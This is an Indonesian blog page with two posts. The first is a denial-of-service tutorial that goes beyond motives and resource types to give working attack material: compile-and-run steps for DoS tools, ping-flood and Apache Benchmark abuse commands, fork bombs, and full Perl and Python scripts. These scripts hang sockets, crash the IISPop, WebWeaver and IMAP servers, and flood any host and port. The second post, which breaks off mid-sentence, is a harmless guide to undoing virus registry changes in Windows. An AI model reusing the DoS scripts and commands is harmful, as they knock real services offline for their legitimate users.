Ihsan2010’s Weblog

serangan denial of service

Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan yang mungkin bisa terjawab diantaranya :

1. Apa itu DoS ?
2. Apa motif cracker untuk melakukan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ?

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu).

Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti hukum ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas ‘flooding’ terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.

.o0 Motif penyerang melakukan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker dalam melakukan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of Service merupakan aktifitas hacker diawal karirnya.

Alasan politik dan ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita bisa melihat dalam ‘perang cyber’ (cyber war), serangan DoS bahkan dilakukan secara terdistribusi atau lebih dikenal dengan istilah ‘distribute Denial of Service’. Beberapa kasus serangan virus semacam ‘code-red’ melakukan serangan DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi, komputer ini disebut ‘zombie’ dalam jargon.

Lebih relevan lagi, keisengan merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk mendapatkan program-program DoS, seperti nestea, teardrop, land, boink, jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of Service dengan sangat tepat, dan yang terpenting sangat mudah untuk melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell yang berupa ./nama_program argv argc …

.o0 Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan client. Spasi swap juga digunakan untuk mem-‘forked’ child process. Bagaimanapun spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan bekerja.

.o0 Teknik Melakukan Denial of Service

Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga tidak begitu menarik. Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan ‘loophole’ pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium ‘FOOF’ Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.
3. Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut “smurfing” (http://www.quadrunner.com/~chuegen/smurf.txt).

Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban.
Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target (misalmya: blocking)
2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.
4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)
6. Syndrop
Merupakan ‘serangan gabungan’ dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melakukan penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas.

Script gs.pl (gantung socket)

#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo –> moby@echo.or.id || mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print “Gunakan: perl gs.pl [host] [port] \n”;
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> “$ARGV[0]”,
PeerPort=> “$ARGV[1]”,
Proto => “tcp”
or die; print “$_\n”
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!

Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU

#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory

#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = “X” x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat terjadi secara remote jika demon (server) tidak melakukan verifikasi input sehingga input membanjiri buffer dan menyebabkan program dihentikan secara paksa.

Beberapa ‘proof of concept’ dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print “Gunakan: perl iispdos.pl [host] \n”;
exit;
}
# Data 289999 bytes
$buff = “A” x 289999;

print “Connecting … >> $ARGV[0] \n”;
$connect = new IO::Socket::INET (
PeerAddr=> “$ARGV[0]”,
PeerPort=> “110”,
Proto=> “tcp”) or die;
print “Error: $_\n”;
print “Connect !!\n”;
print $connect “$buff\n”;
close $connect;
print “Done \n”;
print “POST TESTING setelah serangan \n”;
print “TEST … >> $ARGV[0] \n”;
$connect = new IO::Socket::INET (
PeerAddr => “$ARGV[0]”,
PeerPort => “110”,
Proto => “tcp”) or die;
print “Done !!, $ARGV[0] TEWAS !! \n”;

print “Gagal !! \n”;
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net

Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1…
Connected to localhost.novel.ru.
Escape character is ‘^]’.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1…
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : http://www.brswebweaver.com
BugTraqer : euronymous /F0KP

}——- start of fadvWWhtdos.py —————{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input(“””
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
“””)
target = raw_input(“Type your target hostname [ w/o http:// ]: “)
spl = “f0kp”*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, “/”+spl)
r1 = conn.getresponse()
print r1.status

}——— end of fadvWWhtdos.py —————{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT. Dampak dari serangan ini adalah berhentinya server dan harus di-restart secara manual.

Contoh eksploitasi:
——–[ transcript ]——-
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN “RealUser@infowarfare.dk” “HereIsMyPassword”
0001 OK User authenticated.
0002 SELECT “aaa…[256]…aaaa”
——–[ transcript ]——-

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url: http://packetstormsecurity.nl dengan kata kunci ‘nc’ atau ‘netcat’

Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu – tentu saja – membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.

Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

— udos.pl —

#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : http://www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print “Gunakan % perl udos.pl [host] [port] [data] \n”;
print “Contoh :\n”;
print “\t $ perl udos.pl 127.0.0.1 21 50000 \n”;
exit;
}
# Siapkan data
$buffer = “A” x $ARGV[2];
# Connect -> Korban
print “Connecting … -> $ARGV[0] \n”;
$con = new IO::Socket::INET (
PeerAddr=> “$ARGV[0]”,
PeerPort=> “$ARGV[1]”,
Proto=> “tcp”) or die;
print “Error: $_ \n”;
# Connect !
print “Connect !! \n”;
print $con “$buffer\n”;
close $con;
print “Done. \n”;
print “POST TESTING setelah serangan \n”;
print “TEST … >> $ARGV[0] \n”;
$connect = new IO::Socket::INET (
PeerAddr => “$ARGV[0]”,
PeerPort => “$ARGV[1]”,
Proto => “tcp”) or die;
print “Done !!, $ARGV[0] TEWAS !! \n”;

print “Gagal !! \n”;
close $connect;
# End.

— udos.pl —

Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan flood dan melakukan post testing. Dengan sedikit pemprograman anda dapat membuat sebuah ‘Mass Flooder’ atau ‘Brute Force Flooder’, tergantung pada kreatifitas anda !

.o0 Penanggulangan serangan Denial of Service

Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau bagaimana mudahnya melakukan input flooding dan membuat tool sendiri. Namun Denial of service adalah masalah layanan publik. Sama halnya dengan anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai sehingga toko anda penuh. Anda bisa saja mengatasi ‘serangan’ ini dengan ‘menutup’ toko anda – dan ini adalah cara paling efektif – namun jawaban kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option untuk menolak cracker untuk mengakses system.
2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang ‘rajin’, ‘ulet’ dan ‘terlatih’ akan sangat mudah untuk memasuki sistem dan merusak – tidak tertutup kemungkinan untuk melakukan Denial of Service -. Berhubungan dengan ‘Selalu Up 2 Date’, Denial of service secara langsung dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor atau melakukan up-date.
3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark.
Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ). Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang admin harus teliti.

Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi jumlah pengunjung akan menjaga toko anda dari ‘Denial of Service’. Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman, atau semua user adalah orang ‘baik’. Pertimbangkan semua aspek. Anda bisa menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari admin dan user bersangkutan.

.o0 Penututp.

Berbicara masalah security merupakan hal yang mengasikkan. Teknik-teknik intrusi baru begitu unik dan sebagai seorang geek saya yakin ‘keindahan pengetahuan diatas segalanya’. Anda tidak akan melakukan hal-hal bodoh seputar dokumen ini dan ingat selalu ‘kita tidak pernah tahu segalanya’. Mulailah belajar, perhatikan dunia dan kuasai ! Anda akan terkagum, betapa indahnya semesta ini.

Terima kasih untuk anda semua telah membaca artikel ini – bahkan sampai baris ini 🙂 -. Terima kasih untuk rekan-rekan echo-staff atas support selama ini. Untuk semua Computer Security Industries Indonesia, teruslah berjuang Amigo !! Computer Underground, hey nak, sudah saatnya belajar dan berhenti bermain. Semua teman-teman online TERIMA KASIH !!

Shout buat Willy, Al, Dudunk – semua pengunjung ‘rumah mesum’ 😛 (cuma istilah/jargon) – Thanks buat Rizka, maaf atas ‘pesan-pesan filosofi gelap’, kamu tahu pemilik nomor 08157190*** !. “Ka .. tidak baik marah kepada seseorang yang datang dengan kasih sayang :)”

“KALAU AKU SEORANG ATEIS, MAKA AKAN AKU KATAKAN: ‘TEMPAT YANG PALING AMAN ADALAH PETI MATI’ TAPI TERNYATA AKU SALAH !!” [MOBY]

Bacaan lanjutan / referensi:

[1] Kejahatan Internet, Trik Aplikasi dan Tip Penanggulangannya.
R. Kresno Aji, Agus Hartanto, Deni Siswanto, Tommy Chandra Wiratama.
Elexmedia Komputindo, ISBN: 979-20-3249-5
[2] 7 Cara Isengi Apache dan kiat mengatasinya.
Steven Haryanto, Masterweb Magazine Oktober 2001
[3] Introduction to Denial of Service
Hans Husman, t95hhu@student.tdb.uu.se
[4] CERT ADVISORIES.
http://www.cert.org
[5] Packet Storm Security
http://packetstormsecurity.nl
[6] BugTraq
http://www.securityfocus.com

September 24, 2008 Posted by | Tutorial tentang IT | Leave a comment

Langkah – Langkah Memperbaiki Regedit

BAGIAN 1: MODAL DASAR

1. Cara-cara Alternatif untuk Menjalankan Program

Umumnya kita mengklik ikon program yang ada di start menu atau di desktop untuk menjalankan program tertentu. Tetapi program-program utilitas tidak semuanya tersedia di start menu atau di desktop. Program-program ini (misalnya REGEDIT.EXE, CMD.EXE) biasanya dijalankan melalui menu Start > Run. Apa yang dapat kita lakukan seandainya menu Run tidak ada di start menu? Berikut beberapa alternatif menjalankan program tertentu dengan cara yang ‘tidak biasa’:

a. Memanfaatkan Windows Explorer

Jalankan program Windows Explorer, cari file program yang ingin dijalankan di folder C:\Windows, atau di C:\Windows\System, atau di C:\Windows\System32. Kemudian klik dua kali pada file program tersebut.

b. Memanfaatkan Command Prompt (CMD.EXE)

= Klik Start > Programs > Accessories > Command Prompt, atau jalankan CMD.EXE dengan cara pertama di atas.

= Ketikkan nama program yang ingin dijalankan, kemudian tekan enter.

C:\Documents and Settings\mr. orche!>REGEDIT

c. Menggunakan Batch File

= Jalankan Notepad melalui start menu atau melalui Windows Explorer.
= Ketik nama program yang ingin dijalankan, misalnya “REGEDIT” (tanpa tanda petik).
= Simpan file tersebut menggunakan ekstensi .bat, misalnya “TES.BAT”.
= Jalankan file .bat tersebut melalui Windows Explorer (klik dua kali).

d. Menggunakan Task Manager (TASKMGR.EXE) (Windows XP)

= Tekan Ctrl + Alt + Del.
= Klik tombol [New Task…] pada tab Applications.
= Ketikkan nama program, lalu tekan enter.

e. Memanfaatkan Browser File pada ACDSee

= Jalankan ACDSee dari Start Menu.
= Cari file program yang ingin dijalankan di jendela browser file.
= Klik dua kali pada file program tersebut.


2. Cara-cara Alternatif Operasi Registry

Jika REGEDIT tidak dapat dijalankan, operasi registry masih dapat dilakukan dengan beberapa alternatif berikut:

Alternatif 1: Menggunakan perintah REG

1. Jalankan Command Prompt (CMD.EXE).

2. Untuk melihat daftar key dan value, gunakan perintah REG QUERY lokasikey.
Contoh:
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
REG DELETE HCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

3. Ketikkan REG DELETE namakey /V namavalue untuk menghapus value tertentu.

Contoh:
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoRun
REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoFolderOptions

Catatan:

= Nama root harus disingkat, HKCR untuk HKEY_CLASSES_ROOT, HKLM untuk HKEY_LOCAL_MACHINE, HKCU untuk HKEY_CURRENT_USER, HKU untuk HKEY_USERS, dan seterusnya.

= Untuk nama key yang mengandung spasi, nama key diapit dengan tanda petik ganda.

= Untuk mengetahui tatacara operasi selengkapnya menggunakan perintah REG, ketikkan “REG /?” tanpa tanda petik.

Alternatif 2: Menggunakan file .REG
1. Jalankan Notepad dan ketikkan seperti contoh berikut:

Format baru (WinXP):
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
“NoFolderOptions”=dword:00000000

Format lama (Win9X/NT):
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
“NoFolderOptions”=dword:00000000

2. Simpan file tersebut dengan ekstensi .REG, kemudian klik dua kali pada file .reg yang telah disimpan.

Penjelasan:

= Baris pertama, “Windows Registry Editor Version 5.00” atau “REGEDIT4”, adalah aturan baku untuk menandai file registry.

= Baris kedua, “[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]” menunjukkan lokasi key registry, di mana daftar value beserta nilai data yang disebutkan di bawahnya akan disimpan.

= Baris ketiga, “NoFolderOptions”=dword:00000000, menyebutkan nama value beserta data yang diinginkan untuk value tersebut. Pada contoh ini berarti mengubah/memberi data bernilai 0 pada value bernama “NoFolderOptions”.

= File regedit yang diketik dengan format WinXP (format baru) maupun format lama (Win9X/NT), keduanya dapat digunakan untuk Windows XP, tetapi format lama hanya dapat digunakan untuk Windows 9X/NT.

Alternatif 3: Menggunakan StartUp Disk (hanya berlaku untuk Win9X)
Cara ini adalah cara yang paling susah, dan mungkin merupakan satu-satunya cara efektif memulihkan registry ketika sistem sudah terlanjur lumpuh sama sekali.

1. Boot menggunakan StartUp Disk
a. Masukkan StartUp Disk Win95/98 ke floppy drive.
b. Restart (pastikan konfigurasi setting boot sequence di BIOS menunjuk ke disket).

2. Masuk ke direktori (folder) C:\Windows
A:\>C:
C:\>CD WINDOWS

3. Lakukan ekspor data dari registry ke file .reg khusus untuk key yang diinginkan
Format perintah:
REGEDIT /E namakey namafilereg

Contoh:
REGEDIT /E HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer TES.REG

Jika nama key mengandung spasi, gunakan tanda petik:
REGEDIT /E “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” TES.REG

3. Memunculkan Kembali Menu Folder Options pada Windows Explorer

Beberapa virus perlu menyembunyikan file-file tertentu agar user (pemakai komputer) tidak menyadari adanya virus dan agar virus tersebut lebih susah dihapus, dengan membuat file tersebut menjadi hidden. File hidden tersebut masih dapat dilihat oleh user jika setting Folder Options pada pilihan ‘Show hidden files and folders’ diaktifkan. Kadang-kadang menu inipun dihilangkan oleh virus untuk menjamin file-file virus tetap tak terlihat. Untuk menyembunyikan menu Folder Options, cara paling mudah dan paling umum diterapkan oleh virus adalah dengan mengubah setting registry, dengan menyisipkan value “NoFolderOptions” yang bernilai 1. Untuk memunculkan kembali menu Folder Options, value ini harus dihapus, atau diubah nilainya menjadi “0”.

= Untuk mengubah setting Folder Options, klik menu Tools > Folder Options pada Windows Explorer.

= Value NoFolderOptions pada registry berada salah satu atau kedua lokasi berikut:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Value tersebut dapat dihapus dengan menggunakan program REGEDIT, atau dengan mengetikkan perintah berikut pada Command Prompt:

REG DELETE HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoFolderOptions

REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoFolderOptions

4. Memunculkan Menu Run

Hapus value “NoRun” atau ubah nilainya menjadi 0 dengan menggunakan operasi registry (lihat contoh operasi registry untuk memunculkan menu Folder Options di atas). Value “NoRun” berada pada key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

5. Memunculkan Menu Find

Hapus value “NoFind” atau ubah nilainya menjadi 0 dengan menggunakan operasi registry (lihat contoh operasi registry untuk memunculkan menu Folder Options di atas). Value “NoFind” berada pada key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

6. Mengaktifkan REGEDIT

Kadang-kadang REGEDIT tidak dapat dijalankan karena di-disable melalui setting registry oleh virus. Untuk memulihkan kembali, hapus value “DisableRegistryTools” atau ubah nilainya menjadi 0 dengan menggunakan Command Prompt (hanya untuk WinXP), atau dengan membuat file .REG (hanya untuk Win9X).

7. Memunculkan File Hidden dengan Mengubah Atributnya Melalui Command Prompt

File hidden (tersembunyi) dapat dimunculkan tanpa memainkan Folder Options, tetapi dengan menonaktifkan atribut hidden pada file tersebut. Atribut file hidden hanya dapat diubah di Windows Explorer jika setting Folder Options memungkinkan file hidden ditampilkan. Alternatifnya adalah dengan mengubah atribut file tersebut melalui Command Prompt. Untuk melihat daftar file hidden melalui Command Prompt, gunakan perintah “DIR /AH”. Selanjutnya gunakan perintah ATTRIB diikuti parameter atribut yang akan diubah. Contoh berikut dapat digunakan untuk menonaktifkan atribut hidden, read only, dan system sekaligus, pada semua file di direktori aktif:

ATTRIB –r –h –s *.*

8. Mencari File Melalui Command Prompt

a. Melihat daftar file/folder yang berada di folder aktif:

DIR *.*

b. Melihat daftar file/folder yang berada di folder aktif, termasuk file/folder hidden:

DIR *.* /A “A” adalah singkatan dari “ALL”

c. Melihat daftar file (tidak termasuk folder) yang berada di folder aktif:

DIR *.* /A-D “D” adalah singkatan dari “DIRECTORY”, “-“ berarti pengecualian

d. Melihat daftar folder (tidak termasuk file) yang berada di folder aktif:

DIR *.* /AD “D” adalah singkatan dari “DIRECTORY”

e. Melihat daftar file/folder hidden:

DIR *.* /AH “H” adalah singkatan dari “HIDDEN”

f. Melihat daftar file/folder urut berdasarkan nama:

DIR *.* /ON untuk file dan folder, “O” berarti “ORDER BY”, “N” berarti “NAME”
DIR *.* /AD /ON untuk folder saja
DIR *.* /A-D /ON untuk file saja
DIR *.* /A-DH /ON untuk file hidden saja
DIR *.* /ADH /ON untuk folder hidden saja

g. Melihat daftar file/folder urut berdasarkan tipe (ekstensi)

Caranya mirip dengan pengurutan berdasarkan nama, hanya saja “/ON” diganti dengan “/OE”.

h. Melihat daftar file urut berdasarkan ukuran

Caranya mirip dengan pengurutan berdasarkan nama, hanya saja “/ON” diganti dengan “/OS”.
Untuk informasi rinci tentang aturan pemakaian perintah DIR, ketikkan “DIR /?” lalu tekan enter.

9. Mematikan Proses yang Dicurigai

Yang dimaksud proses adalah program yang berjalan di latar belakang (background program), tidak memiliki form karena tidak dibuat untuk berinteraksi dengan user. Berbeda dengan program aplikasi yang memang terlihat karena harus berinteraksi dengan user. Virus biasanya dibuat sedemikian rupa sehingga ketika virus tersebut berjalan tidak terlihat sama sekali, ia hanya berupa proses. File virus yang sedang berjalan biasanya tidak dapat dihapus karena prosesnya sedang berjalan. Biasanya file virus tersebut baru dapat dihapus setelah prosesnya dihentikan. Daftar program aplikasi dan proses yang sedang berjalan dapat dilihat menggunakan Windows Task Manager (TASKMGR.EXE) cukup dengan menekan tombol Ctrl + Alt + Del. Setelah jendela Windows Task Manager muncul, kita dapat memilih “Applications” untuk melihat daftar program aplikasi; atau “Processes” untuk melihat daftar proses. Pilihan lainnya adalah “Performance”, “Networking”, dan “Users”.
Untuk menghentikan program aplikasi yang sedang berjalan, pilih nama aplikasi dari daftar, kemudian klik tombol “End Task”. Untuk menghentikan proses yang sedang berjalan, pilih nama proses kemudian klik tombol “End Process”. Jika Windows Task Manager tidak dapat dijalankan, kita masih dapat melihat dan menghentikan proses yang sedang berjalan dari Command Prompt dengan memanggil program “TASKLIST.EXE” untuk melihat daftar proses, kemudian memanggil program “TASKKILL.EXE” untuk menghentikan proses.

Contoh:
TASKLIST
TASKKILL /F /IM Notepad.exe /IM MSPAINT.EXE
TASKKILL /F /PID 1230 /PID 1253 /T

Keterangan:
Parameter “/F” yang ber

